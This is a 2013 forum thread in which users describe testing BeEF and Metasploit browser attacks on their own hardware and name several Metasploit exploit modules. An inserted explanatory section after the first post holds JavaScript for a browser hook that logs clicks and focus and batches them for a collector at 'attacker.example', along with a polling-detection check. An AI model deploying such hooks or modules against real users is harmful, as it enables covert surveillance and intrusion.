Adventures with BeEF

Discussion in 'other security issues & news' started by Gullible Jones, Apr 13, 2013.

Thread Status:
Not open for further replies.
  1. Adventures with BeEF (and Metasploit)

    As promised I will post the results of my experiments with the BeEF live DVD here.

    Test platform: Windows Vista Ultimate RTM, with UAC + SRP. This is running on real hardware, not a VM. The BeEF DVD is also running on a real computer.

    Mandatory disclaimer: I AM DOING THIS FOR EDUCATIONAL PURPOSES ONLY. The only computer getting pwned is one of my own spares, which I'm not using for anything else right now. I won't give details on how to use BeEF, only the results. If anyone wants to advise me on how to get better results in these tests, please send a PM instead of posting it publicly.

    Anyway...

    First run:

    - Metasploit failed to start for some reason. I'm currently updating it, hopefully that will fix the issue.

    - Running the "clippy" social engineering animation -> successful. Well, duh.

    - Attempting to read local files through JavaScript -> not successful. Not sure why, I did specify the correct path to the test file.

    - Man-in-the-browser -> definitely successful; seems it can watch everything one does with Firefox, so long as you keep the "hostile" website open. That includes the coordinates of mouse clicks, and even whether the window is focused.

    Haven't attempted any code injection stuff yet. Will post more when I have Metasploit working.
     
    Last edited by a moderator: Apr 14, 2013
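The "man-in-the-browser" result in the post above comes down to ordinary DOM event listeners in a page the victim leaves open, plus a timer that calls home. The following is an added example, not BeEF's own hook script or the thread author's code: it registers click and focus/blur listeners on an event target, batches what it sees for a collector, and shows the defender's side, a check for the fixed-interval polling such a hook produces. The collector URL, the record fields and the polling cadence are assumptions made for the illustration, not BeEF's real protocol.

```javascript
// Added example (not BeEF's code): the mechanics behind the
// man-in-the-browser observation. A script in a page the victim keeps open
// registers DOM listeners and ships each event to a collector; closing or
// navigating away from the page unloads the script, which is why the
// visibility stops at that point.
// Endpoint, field names and polling interval are assumptions for this
// illustration, not BeEF's actual hook protocol.

const C2_URL = "http://attacker.example/hook"; // hypothetical collector

// Attach listeners to `target` (window/document in a browser; any
// EventTarget here so the example also runs under Node) and hand every
// captured record to `sink`. Returns the in-memory queue of records.
function installHook(target, sink) {
  const queue = [];
  const report = (type, extra) => {
    const record = { type, t: Date.now(), ...extra };
    queue.push(record);
    sink(record);
  };
  // Mouse clicks: viewport coordinates of each click.
  target.addEventListener("click", (e) =>
    report("click", { x: e.clientX ?? null, y: e.clientY ?? null }));
  // Focus/blur: whether the victim is currently looking at the hooked tab.
  target.addEventListener("focus", () => report("focus", { focused: true }));
  target.addEventListener("blur", () => report("focus", { focused: false }));
  return queue;
}

// Serialise the queued records into the body the hook would POST to the
// collector on its next poll, and empty the queue.
function encodeBatch(queue) {
  const body = JSON.stringify({ hook: "demo", events: queue.splice(0) });
  return { url: C2_URL, body };
}

// Defender's side: a hooked tab calls home on a fixed timer. Given the
// request timestamps (ms) seen towards one origin, flag a regular cadence.
function looksLikePolling(timestampsMs, intervalMs, toleranceMs) {
  if (timestampsMs.length < 4) return false;
  for (let i = 1; i < timestampsMs.length; i++) {
    const gap = timestampsMs[i] - timestampsMs[i - 1];
    if (Math.abs(gap - intervalMs) > toleranceMs) return false;
  }
  return true;
}

// Stand-alone demo with a constructed EventTarget standing in for `window`.
function demo() {
  const sent = [];
  const target = new EventTarget();
  const queue = installHook(target, (r) => sent.push(r));
  target.dispatchEvent(Object.assign(new Event("click"), { clientX: 120, clientY: 45 }));
  target.dispatchEvent(new Event("blur"));
  target.dispatchEvent(new Event("focus"));
  const { body } = encodeBatch(queue);
  return { sent, body, queueLeft: queue.length };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo().body);
}
```

The point the demo makes is the one the post observed: nothing here survives the hooked page being closed, because the listeners and the timer live in that page's script context. On the wire, the only thing the hook needs is a same-cadence request stream to one origin, which is what `looksLikePolling` keys on when given the request timestamps from a proxy log or browser devtools.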
  2. Okay, Metasploit is working now; I had to start it and BeEF manually. Unfortunately(?) there don't seem to be any exploits known to it that work on Firefox 20.0.1 right now; so for the time being I'm falling back on IE 7, which should be very exploitable.

    Next step: try to actually load something through an exploit.
     
  3. I'm having a lot of trouble verifying that any of this stuff is working at all. No entries in Windows event viewer logs, no output on the BeEF control panel, nada. I think I will look into using the Metasploit console interface, hopefully that will be a little more self-explanatory. (Yeah, right.)

    Edit: I will get back to this tomorrow. Maybe it will make sense in the morning.
     
    Last edited by a moderator: Apr 13, 2013
  4. After doing some research I decided to go with Metasploit and the "autopwn" module. It takes a loooong time to load though. I will report the results once I get to see them...
     
  5. Okay, current results:

    - Fails with IE 7. IE stops loading the page, claiming inability to render it, and autopwn cannot proceed.

    - Fails with Firefox 20.0.1. It looks like there are no workable exploits for the current version (not unless I install Quicktime at least).

    - Succeeds, at least partially, with Opera 12.15. A search of the browser history (visible to the user) is invoked. However, this causes Opera to stop displaying the hostile site, so further compromise apparently can't proceed; and anyway it looks (though I'm not sure?) like this history search thing doesn't involve full control of the browser process.

    I will try again shortly with older versions of Opera and Firefox.
     
  6. And a bit more:

    - Firefox 9.0: fails. autopwn gets stuck on an Apple Quicktime exploit that doesn't work (because Quicktime isn't installed, and I don't intend to install it).

    - Opera 12.00: succeeds, but again never even gets to attempting a payload execution. Yoinking my browser history is all well and good, but not nearly enough - and it's also visible to me, so I know someone's been messing around.

    ---

    This was the point at which I decided to throw in the towel for today. It's become clear that (at this point) I don't know what I'm doing, and am not going to prove or disprove anything this way. Sorry folks, I just don't have the experience required.

    I can see why Blackhole and other exploit kits have gotten popular though. Luckily for us, going after the browser itself seems to be an exercise in frustration at this point...
     
  7. Hungry Man
    Takes some time to figure out how to use those programs. Can't find the old metasploit videos I had... sucks, cause I needed to watch those lol but there are some good resources out there.
     
  8. That much is clear. The msfconsole 'help' command is... singularly unhelpful.
     
  9. Hungry Man
    If I'm not too busy fixing my system I'll download XP and Armitage and set up an exploitable VM. Armitage is wonderful, I highly suggest you look into it. It runs with Metasploit modules/exploit/payload code, and you can use the Metasploit console, but it provides a full interface for it all.

    Disk space is currently an issue. If I can fit XP onto it it should work out. After that I'll do Armitage and see if I can work local exploits into it. If not I'll just do some simple demonstration.

    No promises, I have a lot to do, but that's the "plan" for now if nothing else takes up my time.

    edit: Ideally I'll be running http://www.metasploit.com/modules/exploit/windows/local/ms11_080_afdjoinleaf from shell, but I may just show RCE and then show local separately, and explain how it would work in an actual attack, in case Metasploit doesn't support running the exploit from memory.

    Maybe http://www.metasploit.com/modules/exploit/windows/local/payload_inject

    RCE is looking like: http://www.metasploit.com/modules/exploit/multi/browser/firefox_escape_retval
     
    Last edited: Apr 15, 2013
  10. Thanks. :) Looking forward to the results, if you can get around to it... Meanwhile I shall look into the Armitage GUI, that sounds like what I want.
     